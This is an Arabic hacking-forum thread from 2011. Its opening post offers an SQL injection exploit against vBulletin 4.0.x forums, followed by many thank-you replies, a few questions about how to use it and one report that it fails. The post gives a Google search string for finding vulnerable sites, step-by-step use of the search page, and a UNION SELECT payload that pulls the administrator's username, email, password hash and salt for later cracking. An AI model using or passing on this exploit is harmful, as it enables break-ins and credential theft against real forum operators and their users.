المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : ثغرة في منتديات الفي بي vBulletin 4.0.x



millen!um
05-25-2011, 05:59 PM
السلام عليكم و رحمة الله و بركاته
بسم الله الرحمن الرحيم

إخواني اليوم جايبلكم ثغرة حقن لقواعد البيانات sql injection في منتديات vBulletin الجيل الرابع الإصدارات الأولى 4.0.x

الملف المصاب هو socialgroup.php و سكربت البحث searchtools.php

-----------------------------------------------

نجي للمهم
1- طريقة البحث في العم قوقل ضع هذا الدورك


inurl:"search.php?search_type=1" intext:vbulletin 4

2-إستغلال الثغرة

ستجد الكثير من النتائج في قوقل ادخل على واحدة على سبيل المثال

http://forums.millennium.com/search.php?search_type=1

في منتصف الصفحة فوق خانة الكلمة التي سنبحث عنها اذهب إلى

"Search Multiple Content Types"

ثم ضح صح على خيار groups أو مجموعات

ثم ضع كلمة و ابحث
ثم الحقن يكون كالتالي

UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#


بعد الرابط و النتيجة
ستظهر لنا اليوزر و إيميل و باسوورد الأدمن مشفر و السالت أي نوع التشفير لأنه مهم لنستطيع فك التشفير

ملاحظة " النسخة 4.1.3 vBulletin لا تحوي هذه الثغرة

دمتم بود و السموحة على التقصير

Ace
05-25-2011, 06:38 PM
ابداع ولـــــــــــــــــلـــــ ـــــــــــــــــــــــــ ه استمر يا وحـــــــــــــــــــــــ ـــــــــــــــــــــش

millen!um
05-25-2011, 07:42 PM
بارك الله فيكم على المرور العطر

المنتقم السري
05-27-2011, 03:16 PM
تسلم يا الغالــــــــــــــــــــ ــــــــــــــــــى

M.ViRus
08-21-2011, 06:39 PM
بارك الله فيك اخى الكريم

فارس.فارس
08-23-2011, 10:49 PM
بارك الله فيك, معلومة كويسة.

فارس.فارس
08-30-2011, 12:56 AM
بارك الله فيك ,16,

salaheddin1
09-11-2011, 05:10 AM
مشكووووووور اخوي ما قصرت

أدهم
09-11-2011, 06:59 AM
http://egytrick.cvom/vb http://egytrick.cvom/vb http://egytrick.cvom/vb http://egytrick.cvom/vb http://egytrick.cvom/vb http://egytrick.cvom/vb http://egytrick.cvom/vb

أدهم
09-11-2011, 07:00 AM
ادره تاكل زق هاهاهاهاهاها

HACKER SYRIAN
09-11-2011, 11:28 AM
ابــدآع يـأمسـلـم

شـرح واضـح ومـفـهـوم

تم تـقـيـيمـك يـأبـطل

BACHIRISLAM
09-18-2011, 05:59 PM
شكرا اخي على الثغرة

Fiox
09-20-2011, 01:51 PM
شكرا لك اخي العزيز على الموضوع الجميل

Fiox
09-20-2011, 01:51 PM
thaaaaaaaaanxxxxxxxxxxxxxx

ArsHackEna
02-12-2012, 12:06 AM
حلو مشكوور

ابو عايد
02-12-2012, 12:13 AM
الله يعطيك العافيه مشكووور

V!RUS
02-13-2012, 10:31 PM
لم أفهم وين أضع هده

UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#

عمر البدري
02-15-2012, 07:12 PM
السلام عليكم
تحية طيبة
ياريت تعطينا درس مرئي واكون لك ممنونا

king x
02-15-2012, 08:01 PM
مشكور أخي بس ممكن تشرح كيف أحقن الثغره والله أني أفتهمت بس الى حقن الثغره ما أعرف ممكن تسوي شرح أو عندك طرقه

امير الحروب
02-23-2012, 04:36 PM
بارك الله فيكم على المرور العطر

No FeeL
02-27-2012, 06:26 PM
شكـــــــــــــرا لك حبيبى

سمو الامير هكر
07-07-2012, 11:41 PM
مشكور اخوي علي المعلومات الحلوه

sunstar
07-08-2012, 06:33 PM
شكرا لك يعطيك العافية
نرتقب جديدك القادم قريبا

fayzoun
07-11-2012, 12:14 PM
الثغرة لا تشتغل أخي

gastar
07-12-2012, 05:35 PM
شكرااااااااااااااااا

leverpol124
07-12-2012, 11:22 PM
شكرآآآآآآآآآآآآآآآ